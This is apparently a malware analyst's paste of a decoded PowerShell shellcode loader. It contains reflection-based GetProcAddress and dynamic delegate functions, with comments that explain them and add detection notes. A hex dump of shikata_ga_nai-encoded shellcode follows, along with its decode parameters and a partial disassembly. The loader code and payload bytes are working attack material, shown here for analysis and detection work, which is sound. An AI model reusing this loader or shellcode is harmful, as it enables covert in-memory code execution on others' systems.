James_inthe_box

decoded

Jan 24th, 2019
  # Resolves the address of an exported native function purely through .NET
  # reflection: it digs the non-public Microsoft.Win32.UnsafeNativeMethods type
  # out of the already-loaded System.dll and invokes its GetProcAddress, so no
  # Add-Type / DllImport declaration appears in the script.
  # Parameters: $zXHxk - module (DLL) name handed to GetModuleHandle;
  #             $wyqxq - export name handed to GetProcAddress.
  # Returns: whatever UnsafeNativeMethods.GetProcAddress returns (presumably an
  # IntPtr to the export — the return type is not visible here).
  # Detection note: the function and parameter names look randomized, but the
  # strings 'UnsafeNativeMethods', 'GetProcAddress' and 'GetModuleHandle' are
  # fixed and remain visible to PowerShell script-block logging and AMSI.
  1. function oNA2W {
  2. Param ($zXHxk, $wyqxq)
  # Select the GAC-loaded assembly whose file name is System.dll, then fetch the
  # internal UnsafeNativeMethods type from it by name.
  3. $k5 = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
  4.  
  # Look up the GetProcAddress(HandleRef, String) overload by explicit signature
  # and call it with a HandleRef wrapping the handle GetModuleHandle($zXHxk) gave back.
  5. return $k5.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($k5.GetMethod('GetModuleHandle')).Invoke($null, @($zXHxk)))), $wyqxq))
  6. }
  7.  
  # Builds a delegate type at run time with Reflection.Emit: a dynamic, in-memory
  # assembly named 'ReflectedDelegate' holding module 'InMemoryModule' and a
  # public sealed class 'MyDelegateType' that derives from System.MulticastDelegate.
  # Parameters: $kj    - parameter types of the delegate's Invoke method (mandatory);
  #             $s7F9X - return type of Invoke, defaults to [Void].
  # Returns: the Type produced by TypeBuilder.CreateType().
  # NOTE(review): presumably paired with oNA2W above so a resolved export address
  # can be wrapped in a delegate of this type and invoked — the caller is not on
  # this page, so confirm. Detection note: the assembly/module/type names are
  # literal strings, which makes them a stable artifact for script-block-log
  # searches and for spotting the in-memory assembly in a process dump.
  8. function wvc {
  9. Param (
  10. [Parameter(Position = 0, Mandatory = $True)] [Type[]] $kj,
  11. [Parameter(Position = 1)] [Type] $s7F9X = [Void]
  12. )
  13.  
  # Single chain: DefineDynamicAssembly -> DefineDynamicModule -> DefineType.
  14. $eMCG0 = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
  # Constructor and Invoke carry the 'Runtime, Managed' implementation flags, so
  # the runtime supplies their bodies exactly as it does for a normal delegate type.
  15. $eMCG0.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $kj).SetImplementationFlags('Runtime, Managed')
  16. $eMCG0.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $s7F9X, $kj).SetImplementationFlags('Runtime, Managed')
  17.  
  18. return $eMCG0.CreateType()
  19. }
  20.  
  21. ~~~
  22. Hex dump: d9 cc ba 6d ea ee f8 d9 74 24 f4 58 29 c9 b1 63 31 50 1a 03 50 1a 83 c0 04 e2 f5 b8 c2 58 fa 3f db da d9 74 24 f4 5b 29 c9 b1 5d 83 c3 04 31 43 0e 03 81 56 18 ca dc a5 05 41 fa dd ee 10 98 af 36 cb b5 06 f9 45 46 58 fe 58 18 4d fc ca 16 3e ce b9 60 d0 e1 96 fa a4 44 a6 a5 ff 6a 2c 3e f9 01 1d 5b ea d1 d8 f3 72 f6 90 1a 5d fb 09 86 a2 8d ef ae fa da f4 ef 93 a3 b0 89 5f e8 2d 6a fa e9 da a0 2c cf f8 ce 26 0a 2a 10 3f 00 92 f9 60 7c 72 bb b9 66 f1 64 dc d5 ff b1 8e 18 d8 a7 ea 88 fd 6c a2 bd 9c 19 e6 a6 fb 55 e9 45 a3 96 dd 5d 2f 0b 9d 14 68 c9 8d 64 54 65 97 6f f1 19 fb 5f 02 69 56 8e ca 70 74 9b 16 c0 73 57 cc ea 23 10 6b 63 d6 0c b9 bc 88 11 cd 95 bc c6 e2 be 71 f1 a1 55 6e a2 92 c0 79 20 29 46 86 a9 f3 80 16 d1 17 ca 51 95 60 24 73 77 37 95 52 f5 2a 6e bd 1c 82 e1 ef df c3 a6 ba 10 0f 86 f6 72 0a b6 c7 70 80 f6 79 9d b7 39 97 6e 32 df ef c8 a7 2d 10 49 b7 8e 64 88 a7 7a 8a b4 c3 04 69 b8 0f f3 64 3e 54 f0 62 47 42 05 e3 45 2e 4d db 49 cb 0f c3 4d 24 9e ec b2 38 03 77 85 59 c8 7b dd 96 c5 7f 4c a8 d2 13 46 5b bc 62 7f b0 f1 77 0c 07 ae 8f 0b 20 f5 4e 7b 37 43 94 70 d7 e3 4f aa d0 d3 4b 0e 08 a3 da ed 73 1b 67 7f b2 b3 0d d9 a5 e3 21 d5 34 32 48 e2 75 fb 5a 40 11 63 15 53 6d
  23. Found shikata_ga_nai shellcode len = 99, key = 0x6e916add, decode offset= 26, fpop offset = 0, keyop= add, istart=0x13, 'add edx,dword [eax + 26]'
  24. 0x00000000 d9cc fxch st0,st4
  25. 0x00000002 ba6deaeef8 mov edx,0xf8eeea6d
  26. 0x00000007 d97424f4 fnstenv [esp - 12]
  27. 0x0000000b 58 pop eax
  28. 0x0000000c 29c9 sub ecx,ecx
  29. 0x0000000e b163 mov cl,99
  30. 0x00000010 31501a xor dword [eax + 26],edx
  31. 0x00000013 03501a add edx,dword [eax + 26]
  32. 0x00000016 83c004 add eax,4
  33. 0x00000019 e2f5 loop 0x00000010
  34. 0x0000001b b8c258fa3f mov eax,0x3ffa58c2--> '?X'
  35. 0x00000020 dbda fcmovnu st0,st2
  36. 0x00000022 d97424f4 fnstenv [esp - 12]
  37. 0x00000026 5b pop ebx
  38. 0x00000027 29c9 sub ecx,ecx
  39. 0x00000029 b15d mov cl,93
  40. 0x0000002b 83c304 add ebx,4
  41. 0x0000002e 31430e xor dword [ebx + 14],eax
  42. 0x00000031 03815618cadc add eax,dword [ecx - 590735274]
  43. 0x00000037 a5 movsd
  44. 0x00000038 0541faddee add eax,0xeeddfa41
  45. 0x0000003d 1098af36cbb5 adc byte [eax - 1244973393],bl
  46. 0x00000043 06 push es
  47. 0x00000044 f9 stc
  48. 0x00000045 45 inc ebp
  49. 0x00000046 46 inc esi
  50. 0x00000047 58 pop eax
  51.  
  52. Byte Dump:
  53. ...m....t$.X)..c1P..P........X.?...t$.[)..]...1C...V.....A......6....EFX.X.M...>..`.....D...j,>...[....r...].............._.-j....,...&*.?...`|r..f.d...........l.......U.E...]/..h..dTe.o..._.iV..pt...sW..#.kc...........q..Un...y)F........Q.`$sw7.R.*n.............r..p..y..9.n2....-.I..d..z....i...d>T.bGB..E.M.I...M$...8.w.Y.{....L...F[.b...w....N{7C.p..O...K.....s.g......!.42H.u.Z@.c.Sm